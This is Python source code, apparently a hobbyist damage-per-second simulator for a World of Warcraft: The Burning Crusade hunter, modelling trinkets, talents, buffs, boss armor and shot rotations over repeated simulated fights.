{'1:1':{'auto_shot':60/speed,'steady_shot':60/speed}}\n\n#set bonus modifiers\npet_heal_modifier = SetBonuses.bonuses['pet_heal'] #t5 2pc\nsteady_shot_crit_modifier = SetBonuses.bonuses['steady_shot_crit'] #t5 4pc\naspect_of_the_viper_modifier = SetBonuses.bonuses['aspect_of_the_viper'] #t6 2pc\nsteady_shot_dmg_modifier = SetBonuses.bonuses['steady_shot_dmg'] #t6 4pc\n\n# MM Talent\nmulti_shot_modifier = 1\n\nif buffsActive['bom']: power += (220 * power_modifier)\nif buffsActive['aoth']: power+=(155 * power_modifier)\nif buffsActive['ap_flask']: power+=(120 * power_modifier)\n\n#create trinket objects\nbloodlust_brooch = Trinket('bloodlust brooch',20,120)\nbloodlust_brooch.on_use=True\nbloodlust_brooch.power=70\nbloodlust_brooch.on_power=278\n\nmark_of_conquest = Trinket('mark of conquest',0,17)\nmark_of_conquest.proc_chance_normal = mark_of_conquest.proc_chance_special = 13\nmark_of_conquest.power=54\nmark_of_conquest.mana = 150\nmark_of_conquest.on_hit=True\n\nhourglass_of_the_unraveller = Trinket('hourglass of the unraveller',10,45)\nhourglass_of_the_unraveller.on_power=300\nhourglass_of_the_unraveller.proc_chance_normal=hourglass_of_the_unraveller.proc_chance_special=10\nhourglass_of_the_unraveller.on_crit=True\nhourglass_of_the_unraveller.crit_rating=32\n\ntsunami_talisman = Trinket('tsunami talisman',10,45)\ntsunami_talisman.on_power=340\ntsunami_talisman.crit_rating=38\ntsunami_talisman.proc_chance_normal=tsunami_talisman.proc_chance_special=10\ntsunami_talisman.on_crit=True\n\nashtongue_talisman_of_swiftness = Trinket('ashtongue talisman of swiftness',8,0) # only procs from Steady Shot, with 15% chance\nashtongue_talisman_of_swiftness.proc_chance_special=15\nashtongue_talisman_of_swiftness.on_power=275\nashtongue_talisman_of_swiftness.on_hit=True\n\nmadness_of_the_betrayer = Trinket('madness 
of the betrayer',10,0) #1 proc per minute, 3.05% chance from auto, 4.5% chance from specials\nmadness_of_the_betrayer.proc_chance_normal = (speed/(60/1)*100) #PPM = 1\nmadness_of_the_betrayer.proc_chance_special = 0 #change this\nmadness_of_the_betrayer.on_armor_pen=300\nmadness_of_the_betrayer.on_hit=True\nmadness_of_the_betrayer.hit_rating=20\nmadness_of_the_betrayer.power=84\n\nshattered_sun_pendant_of_might = Trinket('shattered sun pendant of might',10,45)\nshattered_sun_pendant_of_might.proc_chance=10\nshattered_sun_pendant_of_might.on_power=200\nshattered_sun_pendant_of_might.on_hit=True\nshattered_sun_pendant_of_might.agility=18\nshattered_sun_pendant_of_might.power=64\n\nblackened_naaru_sliver = Trinket('blackened naaru sliver',20,45) #figure out how much time to get to max stacks, then find average ap during the 20 seconds\nblackened_naaru_sliver.proc_chance=10\nblackened_naaru_sliver.on_hit=True\n\nabacus_of_violent_odds = Trinket('abacus of violent odds',10,120)\nabacus_of_violent_odds.on_use=True\nabacus_of_violent_odds.on_haste=260\n\n#using this as the 2nd trinket when I'm testing only 1 trinket at a time\nempty_trinket = Trinket('empty trinket',0,0)\n\n#equipped trinkets\ntrinkets=[empty_trinket,shattered_sun_pendant_of_might]\n#print(trinkets[0].name,trinkets[1].name)\n#add the passive/not on-use stats on the trinkets\n\"\"\"for i in range(len(trinkets)):\n #print('ap',power,power+(trinkets[i].power) * power_modifier)\n power += (trinkets[i].power) * power_modifier\n #print('crit',crit_rating,crit_rating+trinkets[i].crit_rating)\n crit_rating += trinkets[i].crit_rating\n #print('crit%',crit_percent,crit_percent+trinkets[i].crit_rating/crit_rating_per_percent)\n crit_percent += trinkets[i].crit_rating/crit_rating_per_percent\n #print('hit',hit,hit+trinkets[i].hit_rating)\n hit += trinkets[i].hit_rating\"\"\"\n\n#pet stats\npet_base_damage_lower = 182\npet_base_damage_upper = 223\npet_power = 700\n\n#how much dps each class gets from 1 ap. Used to calculate expose weakness dps\ndps_per_ap = {'rogue':0.3905,'hunter':0.314,'bm_hunter_pet':0.247,'survival_pet':0.1145,'enhancement':0.3,'dps_warrior':0.278,'feral':0.16,'retribution':0.111112,'protection_warrior':0.0715}\n#add extra stats from blessing of kings\nif buffsActive['bok']:\n agility*=1.1\n intellect*=1.1\n spirit*=1.1\n\n#talents\nif talents.lightning_reflexes==5: agility*=1.15 #15% agility\nif talents.lethal_shots!=0: crit_percent+=talents.lethal_shots #5% crit\nif talents.mortal_shots!=0: crit_bonus+=((6*talents.mortal_shots)/100) #30% crit damage (6% for each point)\nif talents.combat_experience!=0: #2% agi and 6% int\n agility*=1.02\n intellect*=1.06\nif talents.careful_aim!=0: power+=(intellect*(1+((talents.careful_aim*15)/100))*power_modifier) #45% of intellect as attack power (15% per point)\nif talents.master_marksman!=0: #10% ap (2% per point)\n power*=(1+((talents.master_marksman*2)/100))\n power_modifier+=((talents.master_marksman*2)/100)\nif talents.survival_instincts!=0: #4% ap (2% per point)\n power*=(1+((talents.survival_instincts*2)/100))\n power_modifier+=((talents.survival_instincts*2)/100)\nif talents.killer_insticts!=0: crit_percent+=talents.killer_insticts #3% crit (1% each point)\nif talents.barrage!=0: multi_shot_modifier+=((talents.barrage*4)/100)\n\ncleave = False\ncleave_targets = 3\ntimer = 0\niteration_counter = 0\niterations = 1001 #the amount of fights the program will simulate, then find the median dps from those fights. 
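\n#A minimal sketch of the wrap-up this comment describes (the statistics\n#import is an assumption, not part of the original script):\n#    import statistics\n#    median_dps = statistics.median(iterations_damage) / maxtime\n#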
The more iterations the more accurate but the longer it takes\nmaxtime = 300 #for how long each iteration will run, in seconds\niteration_time=maxtime #time will be used as the countdown, the maxtime variable just exists for calculating the dps so I know how long the program was running after it finishes running.\nwait_time = 0 #this is used as a cast time, so if you're casting an ability with a cast time of 2 seconds, this becomes 2 and you spend 2 seconds in a loop doing nothing, simulating a cast time\ngcd = 0 #global cooldown for the player, so if this is more than 0, the player has to wait for it to reach 0 before he can use an ability on the global cooldown\ngcdVal = 1.5 #hunter abilities are on a 1.5s global cooldown\naa_gcd = 0 #gcd for auto shot, only matters for instant cast abilities since auto shot can't be instant after using them, but instead goes on a 0.5s gcd\naa_gcd_val = 0.5\ntime_per_frame = 0.01\nmp5_time = 0\niterations_damage = list()\nexpose_weakness_uptime_list = list()\nexpose_weakness_uptime = 0\nexpose_weakness_dps = 0\nexpose_weakness_dps_list = list()\nkill_command_window = 0 #when u crit u get 5 seconds to use kill command, this keeps track of whether that window is open or not\n\ndamage = 0 #total damage counter\nbuffs = {'quickshots': 0, 'rapidfire': 0, 'berserking': 0,'drums_of_battle':0,'master_tactician':0} #active buffs, the key is the buff name and the value is the duration.\nhunters_mark_timer = 5000000 #the debuff timer on hunter's mark\nhunters_mark_attacks = 30 #how many attacks have been on the target with hunter's mark up (30 attacks = extra 330 attack power)\n\n#Ability cooldowns\ncooldowns = {'multi_shot':0,'arcane_shot':0,'misdirection':0,'demonic_rune':0,'mana_potion':0,'drums':0,'auto_shot':0,'rapid_fire':0,'berserking':0,'kill_command':0}\n#puts trinket names in the cooldowns/buffsactive/buffs dictionaries so as to avoid an Out of Bounds Index error\ncooldowns[trinkets[0].name] = 0\ncooldowns[trinkets[1].name] = 0\nbuffsActive[trinkets[0].name] = False\nbuffsActive[trinkets[1].name] = False\nbuffs[trinkets[0].name] = 0\nbuffs[trinkets[1].name] = 0\n\nboss_max_hp = 5700000\nboss_hp = boss_max_hp\nboss_armor = 7700 - armor_pen #7700 is the armor for the majority of bosses in TBC (at least t4 and t5). 
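\n#Worked example of the mitigation formula below: with all three armor\n#debuffs up (and ignoring armor_pen from gear), boss_armor becomes\n#7700 - 2600 - 800 - 610 = 3690, so physical hits deal about\n#1 - 3690 / (3690 + 400 + 85 * (70 + 4.5 * 11)), i.e. ~74% of raw damage.\n#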
Adjust this as you wish if you're testing against a specific boss.\nboss_debuffs = {'sunder':True,'faerie':True,'cor':True,'iseal_of_the_crusader':True,'jow':True,'expose_weakness':False}\nboss_debuff_timers = {'expose_weakness':0}\nif boss_debuffs['sunder']:\n boss_armor -= 2600\nif boss_debuffs['faerie']:\n boss_armor -= 800\nif boss_debuffs['cor']:\n boss_armor -= 610\nboss_armor_reduction = 1 - (boss_armor / (boss_armor+400+85*(level+4.5*(70-59))))\nif boss_debuffs['iseal_of_the_crusader']:\n crit_percent+=3\n#adjusts the ranged weapon speed based on the attack speed % gained from the quiver\nif quiver > 0: \n speed /= 1 + (quiver / 100)\n casting_haste += (quiver / 100)\n#boss armor mitigation formula taken from wow.gamepedia.com not sure if this is how it is in TBC, needs further research\nif buffsActive['fi']: #ferocious inspiration (bm hunter buff)\n damage_modifier+=0.02\nexpose_weakness_ap = 0 #track the AP given by the expose weakness\n\n#warning if the hit with current gearset is under the cap\nif hit < math.ceil(((hit_rating_per_percent*9)-(talents.surefooted*hit_rating_per_percent))):\n print('hit too low', hit)\n\nrotations = {'3:2':['aa','ss','ss','aa','ss'],'1:1.5':['aa','ss','ms','aa','ss','aa','ss','as','aa','ss'],'1:1':['aa','ss']}\nrotation = '1:1.5'\nrotation_index = 0\n\ndebugging = False\n\nmadness_uptime=0\nmadness_uptime_list = list()\n\n#Simulation\ndef main(): \n global cooldowns,maxtime,iteration_time,wait_time,gcd,race,agility,intellect,spirit,speed,power,hit,crit_rating,crit_percent,quiver,mana,mp5,gcdVal,casting_haste,damage,buffs,buffsActive,hunters_mark_timer,hunters_mark_attacks,aa_gcd,total_dmg,timer,trinkets,madness_uptime_list,madness_uptime,iteration_counter\n iteration_time=maxtime\n # function that makes the imaginary time in the simulation pass, 0.1 second at a time.\n # this is used as well to make all buff durations and ability cooldown etc pass and if the buff duration reaches 0, it deactivates the buff\n def pass_time():\n global iteration_time,wait_time,gcd,hunters_mark_timer,buffs,speed,casting_haste,power,aa_gcd,mp5_time,mana,gcdVal,expose_weakness_ap,expose_weakness_uptime,expose_weakness_dps,timer,kill_command_window,armor_pen,crit_percent,counter,madness_uptime\n iteration_time-=time_per_frame\n wait_time-=time_per_frame\n gcd -= time_per_frame\n aa_gcd -= time_per_frame\n timer += time_per_frame\n kill_command_window -= time_per_frame\n hunters_mark_timer -= time_per_frame\n #if buffsActive['madness of the betrayer']:\n #madness_uptime += time_per_frame\n for buff in buffs:\n buffs[buff]-=time_per_frame\n boss_debuff_timers['expose_weakness']-=time_per_frame\n mp5_time += time_per_frame\n if boss_debuffs['expose_weakness']:\n expose_weakness_uptime+=time_per_frame\n for ability in cooldowns:\n cooldowns[ability]-=time_per_frame\n for a in range(len(trinkets)):\n if buffs[trinkets[a].name] <= 0 and buffsActive[trinkets[a].name]:\n buffsActive[trinkets[a].name] = False\n power -= (trinkets[a].on_power * power_modifier)\n armor_pen -= trinkets[a].on_armor_pen\n h = (trinkets[a].on_haste / haste_rating_per_percent) / 100\n speed *= (1 + h)\n casting_haste += h\n #TODO change this into a function and put the values for each buff into an array and another array saying what the value is (haste/agility/attack power or w/e) and they all use the same array index\n if buffs['quickshots'] <= 0 and buffsActive['quickshots']:\n buffsActive['quickshots'] = False\n speed *= 1.15\n casting_haste -= 0.15\n gcdVal *= 1.15\n if buffs['rapidfire'] <= 0 and 
buffsActive['rapidfire']:\n buffsActive['rapidfire'] = False\n speed *= 1.4\n casting_haste -= 0.4\n gcdVal *= 1.4\n if buffs['berserking'] <= 0 and buffsActive['berserking']:\n buffsActive['berserking'] = False\n speed *= 1.1\n casting_haste -= 0.1\n gcdVal *= 1.1\n if buffs['drums_of_battle'] <= 0 and buffsActive['drums_of_battle']:\n buffsActive['drums_of_battle'] = False\n speed*=(1+((80/haste_rating_per_percent)/100))\n casting_haste-=((80/haste_rating_per_percent)/100)\n if buffs['master_tactician'] <= 0 and buffsActive['master_tactician']:\n crit_percent -= (talents.master_tactician * 2)\n buffsActive['master_tactician'] = False\n if boss_debuff_timers['expose_weakness'] <= 0 and boss_debuffs['expose_weakness']:\n boss_debuffs['expose_weakness'] = False\n expose_weakness_ap = 0\n if mp5_time >= 5:\n mana += mp5\n mp5_time = 0\n if mana > maxmana:\n mana = maxmana\n if hunters_mark_timer <= 0:\n hunters_mark_attacks = 0\n def wait_gcd():\n global speed,damage,casting_haste,gcdVal,debugging\n while gcd > 0:\n if cooldowns['auto_shot'] <= 0 and aa_gcd <= 0 and rotations[rotation][rotation_index] == 'aa':\n cast('auto_shot',0,0,speed,aa_gcd,False)\n increment_rotation()\n pass_time()\n #used to simulate a cast bar, 's' is the cast time\n def wait(s):\n global time_per_frame\n t = s\n while t > time_per_frame:\n pass_time()\n t-=time_per_frame\n pass_time()\n\n def cast(spell,gcdd,manacost,cd,cast_time,waiting_gcd):\n global gcd,mana,cooldowns,cleave,damage,talents,debugging,aa_gcd,buffsa,buffsActive,speed,casting_haste,gcdVal\n if waiting_gcd:\n wait_gcd()\n wait(cast_time)\n\n if spell == 'multi_shot':\n while cooldowns['multi_shot'] > 0:\n pass_time()\n if debugging:\n print('multi-shot')\n basedmg = 205\n dmgfromap = ((power+expose_weakness_ap+get_hunters_mark_ap())/14)\n #if it's a cleave fight, multi shot hits 3 targets\n if cleave:\n for _ in range(cleave_targets-1):\n #The False parameter indicates that this is not a crit against the main target (boss) meaning it won't refresh the expose weakness debuff on the boss\n if is_crit(False):\n damage += ((((base_weapon_dmg_lower+base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + dmgfromap + basedmg) * crit_bonus) * ((damage_modifier+multi_shot_modifier)-1) * boss_armor_reduction\n if talents.thrill_of_the_hunt!=0: mana += mana_cost * 0.4 * (talents.thrill_of_the_hunt/3) #change so instead of getting x% of the amount, it rolls to either get nothing, or the full 40% amount\n else:\n damage += (((base_weapon_dmg_lower+base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + dmgfromap + basedmg) * ((damage_modifier+multi_shot_modifier)-1) * boss_armor_reduction\n if is_crit():\n damage += ((((base_weapon_dmg_lower+base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + dmgfromap + basedmg) * crit_bonus) * ((damage_modifier+multi_shot_modifier)-1) * boss_armor_reduction\n if talents.thrill_of_the_hunt!=0: mana += mana_cost * 0.4 * (talents.thrill_of_the_hunt/3) #change so instead of getting x% of the amount, it rolls to either get nothing, or the full 40% amount\n else:\n damage += (((base_weapon_dmg_lower+base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + dmgfromap + basedmg) * ((damage_modifier+multi_shot_modifier)-1) * boss_armor_reduction\n if is_crit():\n damage += ((((base_weapon_dmg_lower+base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + dmgfromap + basedmg) * crit_bonus) * ((damage_modifier+multi_shot_modifier)-1) * boss_armor_reduction\n if talents.thrill_of_the_hunt!=0: mana += mana_cost * 0.4 * 
(talents.thrill_of_the_hunt/3) #change so instead of getting x% of the amount, it rolls to either get nothing, or the full 40% amount\n else:\n damage += (((base_weapon_dmg_lower+base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + dmgfromap + basedmg) * ((damage_modifier+multi_shot_modifier)-1) * boss_armor_reduction\n attack()\n elif spell == 'arcane_shot':\n while cooldowns['arcane_shot'] > 0:\n pass_time()\n if debugging:\n print('arcane shot')\n aa_gcd = aa_gcd_val\n basedmg = 273\n dmgfromap = (power + expose_weakness_ap + get_hunters_mark_ap())*0.15\n if is_crit():\n damage += ((basedmg + dmgfromap) * crit_bonus) * damage_modifier\n if talents.thrill_of_the_hunt!=0: mana += mana_cost * 0.4 * (talents.thrill_of_the_hunt/3) #change so instead of getting x% of the amount, it rolls to either get nothing, or the full 40% amount\n else:\n damage += (basedmg + dmgfromap) * damage_modifier\n attack()\n elif spell == 'auto_shot':\n while cooldowns['auto_shot'] > 0:\n pass_time()\n if debugging:\n print('auto shot')\n if is_crit():\n #if it's a critical hit, take a random number between the lower and upper range multiplied by 2 or 2.3 depending on talents\n damage += ((((base_weapon_dmg_lower + base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + (((power+expose_weakness_ap+get_hunters_mark_ap())/14) * base_speed) * crit_bonus) * damage_modifier) * boss_armor_reduction\n else:\n #if it's not a crit, select a random number between the lower and upper range\n damage += (((base_weapon_dmg_lower + base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + (((power+expose_weakness_ap+get_hunters_mark_ap())/14) * base_speed) * damage_modifier) * boss_armor_reduction\n attack()\n\n #Improved Aspect of the Hawk proc roll\n if buffsActive['aoth'] and talents.iaoth != 0:\n i = random.randint(1,100)\n if i >= 1 and i <= 10:\n buffs['quickshots'] = 12\n if not buffsActive['quickshots']:\n old_speed = speed\n speed /= (1 + ((talents.iaoth*3)/100))\n casting_haste += ((talents.iaoth*3)/100)\n gcdVal /= (1 + ((talents.iaoth*3)/100))\n recalculate_rotation(old_speed)\n buffsActive['quickshots'] = True\n elif spell == 'steady_shot':\n if debugging:\n print('steady shot')\n basedmg = 150\n dmgfromap = (power+expose_weakness_ap+get_hunters_mark_ap())*0.2\n #roll for crit or not\n if is_crit(True,True): #First paremeter is whether it's on the main target (only used for cleave) and second paremeter is whether it's Steady Shot or not, for calculating the 4pc t5 bonus\n damage += (((basedmg + dmgfromap + ((base_weapon_dmg_lower + base_weapon_dmg_upper) / 2)) * crit_bonus) * (damage_modifier + steady_shot_dmg_modifier - 1)) * boss_armor_reduction\n if talents.thrill_of_the_hunt!=0: mana += mana_cost * 0.4 * (talents.thrill_of_the_hunt/3) #change so instead of getting x% of the amount, it rolls to either get nothing, or the full 40% amount\n else:\n damage += ((basedmg + dmgfromap + ((base_weapon_dmg_lower + base_weapon_dmg_upper) / 2)) * (damage_modifier + steady_shot_dmg_modifier - 1)) * boss_armor_reduction\n attack()\n\n cooldowns[spell] = cd\n gcd = gcdd\n mana -= manacost\n\n #use RNG to see if it's a critical hit\n #roll between 100 and 10000 instead of between 1 and 100 so the crit percent is an integer instead of a double. 
28.81% becomes 2881 so it's more accurate\n def is_crit(main_target=True,Steady_Shot=False):\n global expose_weakness_ap,power,kill_command_window\n i = random.randint(100,10000)\n is_crit=False\n crt = crit_percent if Steady_Shot == False else crit_percent+steady_shot_crit_modifier #if 4pc t5 is equipped then Steady Shot gets 5% more crit\n if i >= 100 and i <= (crt*100):\n is_crit=True\n if main_target:\n boss_debuff_timers['expose_weakness'] = 7\n if expose_weakness_ap < agility*0.25:\n expose_weakness_ap = agility*0.25\n boss_debuffs['expose_weakness'] = True\n kill_command_window = 5\n trinket_proc(True) #True because it's a crit\n else:\n trinket_proc(False) #False because it's not a crit\n return is_crit\n\n #returns a float, how much damage expose weakness gave during the fight\n def calculate_expose_weakness_dps():\n number_of_class={'rogue':1,'hunter':2,'bm_hunter_pet':2,'survival_pet':1,'enhancement':2,'dps_warrior':1,'feral':1,'retribution':1,'protection_warrior':1}\n d = 0\n exposeap = agility*0.25\n for c,n in number_of_class.items():\n d += dps_per_ap[c] * exposeap * n\n return d\n\n #returns how much ap hunters mark is giving\n def get_hunters_mark_ap():\n if hunters_mark_timer > 0:\n if hunters_mark_attacks >= 30:\n return 440\n else:\n return hunters_mark_attacks * 11\n return 0\n\n #runs each time a ranged attack is made, rolls on-hit talents and adds to the hunters mark attack counter\n def attack():\n global hunters_mark_attacks,hunters_mark_timer,crit_percent\n if talents.master_tactician != 0:\n i = random.randint(1,100)\n if i >= 1 and i <= 6 and buffsActive['master_tactician'] == False:\n crit_percent += (talents.master_tactician * 2)\n buffsActive['master_tactician'] = True\n buffs['master_tactician'] = 8\n if hunters_mark_timer > 0:\n if hunters_mark_attacks < 30:\n hunters_mark_attacks += 1\n\n # runs on ability uses/auto attacks and rolls a chance to proc the player's trinket(s)\n def trinket_proc(ccrit=False):\n global mana,power,speed,casting_haste,armor_pen\n for a in range(2): #assumes 2 trinkets equipped\n if (trinkets[a].on_hit or (trinkets[a].on_crit and ccrit)) and cooldowns[trinkets[a].name] <= 0:\n i = random.randint(1,100)\n if i >= 1 and i <= trinkets[a].proc_chance:\n if buffsActive[trinkets[a].name] == False: #only apply whatever stat it gives if the buff is not already active\n if trinkets[a].on_mana != 0: mana += trinkets[a].on_mana\n if trinkets[a].duration > 0:\n if buffsActive[trinkets[a].name] == False: #only apply whatever stat it gives if the buff is not already active\n old_speed = speed\n if trinkets[a].on_power != 0: power += (trinkets[a].on_power * power_modifier)\n if trinkets[a].on_armor_pen != 0:\n armor_pen += trinkets[a].on_armor_pen\n h = (trinkets[a].on_haste / haste_rating_per_percent) / 100\n speed /= (1 + h)\n casting_haste -= h\n recalculate_rotation(old_speed)\n buffsActive[trinkets[a].name] = True\n buffs[trinkets[a].name] = trinkets[a].duration\n cooldowns[trinkets[a].name] = trinkets[a].cooldown\n #print('trinket proc',trinkets[a].name)\n\n #attempts to use a trinket in slot 1 or 2 if it's off cooldown and an on-use trinket\n def use_trinket(slot):\n global printed,power,armor_pen,speed,casting_haste\n if trinkets[slot].on_use and cooldowns[trinkets[slot].name] <= 0:\n cooldowns[trinkets[slot].name] = trinkets[slot].cooldown\n buffsActive[trinkets[slot].name] = True\n buffs[trinkets[slot].name] = trinkets[slot].duration\n power += (trinkets[slot].on_power * power_modifier)\n armor_pen += trinkets[slot].on_armor_pen\n h = 
(trinkets[slot].on_haste / haste_rating_per_percent) / 100\n            speed /= (1 + h)\n            casting_haste -= h\n\n    def increment_rotation():\n        global rotation_index,rotation,rotations\n        rotation_index += 1\n        if rotation_index >= len(rotations[rotation]):\n            rotation_index = 0\n\n    def recalculate_rotation(old_speed):\n        #rotation and rotation_index are module-level state, so they must be declared global before being reassigned here\n        global rotation,rotation_index\n        if speed >= 2.5 and old_speed < 2.5:\n            rotation = '1:1.5'\n            rotation_index = 0\n        elif speed >= 1.7 and old_speed >= 2.5:\n            rotation = '3:2'\n            rotation_index = 0\n        elif speed < 1.7 and old_speed >= 1.7:\n            rotation = '1:1'\n            rotation_index = 0\n\n    #run this function every time the boss armor changes (armor penetration) so the damage reduction formula adjusts itself\n    def recalculate_boss_armor_reduction():\n        global boss_armor,boss_armor_reduction\n        boss_armor = 7700 - armor_pen #7700 is the armor for the majority of bosses in TBC (at least t4 and t5). Adjust this as you wish if you're testing against a specific boss.\n        #reads the module-level boss_debuffs dict set up at the top of the file\n        if boss_debuffs['sunder']:\n            boss_armor -= 2600\n        if boss_debuffs['faerie']:\n            boss_armor -= 800\n        if boss_debuffs['cor']:\n            boss_armor -= 610\n        boss_armor_reduction = 1 - (boss_armor / (boss_armor+400+85*(level+4.5*(70-59))))\n\n    # the iteration loop. iteration_time is how many seconds of combat each iteration simulates\n    while iteration_time > 0:\n        iteration_counter += 1\n        global expose_weakness_uptime,expose_weakness_dps,rotation_index,rotation,rotations,debugging\n        recalculate_boss_armor_reduction()\n\n        #kill command\n        if cooldowns['kill_command'] <= 0 and mana >= 75 and kill_command_window > 0:\n            cast('kill_command',0,75,5,0,False)\n            #TODO add pet crit chance\n            damage += random.randint(pet_base_damage_lower+127,pet_base_damage_upper+127) * boss_armor_reduction\n        #change to aspect of the viper at 10% mana\n        if ((mana / maxmana) <= 0.1 and (mana/maxmana) < (boss_hp/boss_max_hp)) and buffsActive['aotw'] == False:\n            wait_gcd()\n            buffsActive['aoth'] = False\n            power-=(155*power_modifier)\n            buffsActive['aotw'] = True\n            mp5 += (intellect*(0.55+aspect_of_the_viper_modifier) + (level * 0.35))\n            aa_gcd = aa_gcd_val\n            #finish the mp5 bonus\n        #use hunter's mark if it's about to run out\n        \"\"\"if hunters_mark_timer <= 5:\n            while mana < 60 or gcd > 0:\n                pass_time()\n            hunters_mark_attacks_timer = 120\n            aa_gcd = aa_gcd_val\n            cast('',gcdVal/casting_haste,60,0,0,True)\"\"\"\n        #pop drums if missing mana is 600 or more\n        if mana <= maxmana-600 and cooldowns['drums'] <= 0:\n            #TODO do drums get 1s gcd or 1.5s?\n            cast('drums',gcdVal/casting_haste,-600,120,1,True)\n        #pop drums when available (haste)\n        \"\"\"if cooldowns['drums'] <= 0:\n            cast('drums',0,0,120,0,True)\n            old_speed = speed\n            speed /= (1+((80/haste_rating_per_percent)/100))\n            casting_haste += ((80/haste_rating_per_percent)/100)\n            buffsActive['drums_of_battle'] = True\n            buffs['drums_of_battle'] = 30\n            recalculate_rotation(old_speed)\"\"\"\n        #pop demonic rune if missing mana is 1500 or more\n        \"\"\"if (mana <= maxmana - 1500) and cooldowns['demonic_rune'] <= 0:\n            cast('demonic_rune',0,random.randint(-1500,-900),120,0,False)\"\"\"\n        #pop mana potion if missing mana is 3000 or more\n        if (mana <= maxmana - 3000) and cooldowns['mana_potion'] <= 0:\n            cast('mana_potion',0,random.randint(-3000,-1800),120,0,False)\n        #change to aspect of the hawk when near full mana or when mana % has caught up to the boss hp % (needs further tweaking for when to switch back to aoth)\n        if ((mana / 
maxmana) >= 0.95 or (mana / maxmana) >= (boss_hp / boss_max_hp)) and buffsActive['aoth'] == False:\n wait_gcd()\n buffsActive['aoth'] = True\n power += 155*power_modifier\n if buffsActive['aotw']:\n buffsActive['aotw'] = False\n mp5 -= (intellect*(0.55+aspect_of_the_viper_modifier) + (level * 0.35))\n aa_gcd = aa_gcd_val\n #pop on-use trinkets, racial, and rapid fire\n if hunters_mark_attacks >= 30 and (cooldowns['rapid_fire'] <= 0 and cooldowns['berserking'] <= 0 and ((trinkets[0].on_use and cooldowns[trinkets[0].name] <= 0) or (trinkets[1].on_use and cooldowns[trinkets[1].name] <= 0))): #TODO add on-use trinkets\n cooldowns['rapid_fire'] = 180\n #cooldowns['berserking'] = 180\n buffs['rapidfire'] = 15\n buffs['berserking'] = 10\n buffsActive['rapidfire'] = True\n #buffsActive['berserking'] = True\n old_speed = speed\n speed /= 1.4\n #speed /= 1.1\n casting_haste += 0.4\n #casting_haste += 0.1\n gcdVal /= 1.4\n #gcdVal /= 1.1\n use_trinket(0)\n use_trinket(1)\n recalculate_rotation(old_speed)\n #pop rapid fire and berserking\n if hunters_mark_attacks >= 30 and (cooldowns['rapid_fire'] <= 0 and cooldowns['berserking'] <= 0):\n cooldowns['rapid_fire'] = 180\n #cooldowns['berserking'] = 180\n buffs['rapidfire'] = 15\n buffs['berserking'] = 10\n buffsActive['rapidfire'] = True\n #buffsActive['berserking'] = True\n old_speed = speed\n speed /= 1.4\n #speed /= 1.1\n casting_haste += 0.4\n #casting_haste += 0.1\n gcdVal /= 1.4\n #gcdVal /= 1.1\n recalculate_rotation(old_speed)\n #pop trinket\n if hunters_mark_attacks >= 30 and ((trinkets[0].on_use and cooldowns[trinkets[0].name] <= 0) or (trinkets[1].on_use and cooldowns[trinkets[1].name] <= 0)):\n old_speed = speed\n use_trinket(0)\n use_trinket(1)\n recalculate_rotation(old_speed)\n #use misdirect if it's available and global cooldown is 0\n \"\"\"if cooldowns['misdirection'] <= 0 and gcd <= 0 and mana >= 304:\n cast('misdirection',gcdVal/casting_haste,304,120,0,True)\n aa_gcd = aa_gcd_val\n #misdirect if it's available\n if cooldowns['misdirection'] <= 0:\n while gcd > 0 or mana < 304:\n pass_time()\n cast('misdirection',gcdVal/casting_haste,304,120,0,True)\n aa_gcd = aa_gcd_val\"\"\"\n #multi-shot/arcane shot instead of steady shot in 1:1 rotation\n if rotation == '1:1' and rotations[rotation][rotation_index] == 'ss' and ((cooldowns['multi_shot'] <= 0 and mana >= 275) or (cooldowns['arcane_shot'] <= 0 and mana >= 230)):\n if cooldowns['multi_shot'] <= 0:\n if mana >= 275:\n mana_cost = 275\n while cooldowns['multi_shot'] > 0 or gcd > 0:\n pass_time()\n cast('multi_shot',gcdVal/casting_haste,mana_cost,9,0.5/casting_haste,True)\n increment_rotation()\n elif cooldowns['arcane_shot'] <= 0:\n if mana >= 230:\n mana_cost = 230\n while cooldowns['arcane_shot'] > 0:\n pass_time()\n as_cd = (6-talents.iarcane_shot * 0.2) if talents.iarcane_shot!=0 else 6\n cast('arcane_shot',gcdVal,mana_cost,as_cd,0,True)\n increment_rotation()\n\n #auto shot\n if rotations[rotation][rotation_index] == 'aa':\n while aa_gcd > 0 or cooldowns['auto_shot'] > 0:\n pass_time()\n #cooldowns['auto_shot'] = speed\n cast('auto_shot',0,0,speed,aa_gcd,False)\n increment_rotation()\n #steady shot\n if rotations[rotation][rotation_index] == 'ss':\n mana_cost = 110\n if mana >= mana_cost:\n cast('steady_shot',gcdVal/casting_haste,mana_cost,0,1.5/casting_haste,True)\n increment_rotation()\n #multi-shot\n if rotations[rotation][rotation_index] == 'ms':\n if mana >= 275:\n mana_cost = 275\n while cooldowns['multi_shot'] > 0 or gcd > 0:\n pass_time()\n 
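#[editor's note] the busy-wait just above is the simulator's core timing pattern: advance the simulated clock in fixed time_per_frame (0.1s) steps via pass_time() until the ability cooldown and the GCD are both ready, then cast. A minimal sketch of the same idea as a reusable helper (hypothetical name, not part of the original):\n                #def wait_until(ready):\n                #    while not ready():\n                #        pass_time()\n                #wait_until(lambda: cooldowns['multi_shot'] <= 0 and gcd <= 0)\n                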
